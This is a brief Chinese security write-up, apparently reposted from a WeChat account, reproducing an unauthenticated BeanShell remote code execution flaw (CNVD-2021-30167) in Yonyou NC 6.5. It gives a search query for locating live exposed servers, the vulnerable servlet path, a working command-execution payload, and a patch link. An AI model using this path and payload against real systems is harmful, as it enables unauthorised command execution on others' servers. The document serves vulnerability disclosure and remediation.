CNVD-2021-30167:用友NC BeanShell RCE复现

  • A+
所属分类:安全文章


上方蓝色字体关注我们,一起学安全!
作者:蚂蚁@Timeline Sec
本文字数:361
阅读时长:2~3min
声明:请勿用作违法用途,否则后果自负


0x01 简介

用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。


0x02 漏洞概述
用友NC由于对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码从而获取服务器权限。

0x03 影响版本

用友NC6.5版本


0x04 环境搭建

国外在线环境

title=="YONYOU NC" && country="SG"


CNVD-2021-30167:用友NC BeanShell RCE复现

0x05 漏洞复现

1、访问

/servlet/~ic/bsh.servlet.BshServlet

得到如图:


CNVD-2021-30167:用友NC BeanShell RCE复现


2、我们发现这里有执行代码的接口我们输入payload如:exec("whoami");即可看到命令执行成功


CNVD-2021-30167:用友NC BeanShell RCE复现


0x06 修复方式


该漏洞为第三方jar包漏洞导致,用友NC官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。


补丁下载链接:

http://umc.yonyou.com/ump/querypatchdetailedmng? PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19


CNVD-2021-30167:用友NC BeanShell RCE复现

CNVD-2021-30167:用友NC BeanShell RCE复现
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行





本文始发于微信公众号(Timeline Sec):CNVD-2021-30167:用友NC BeanShell RCE复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: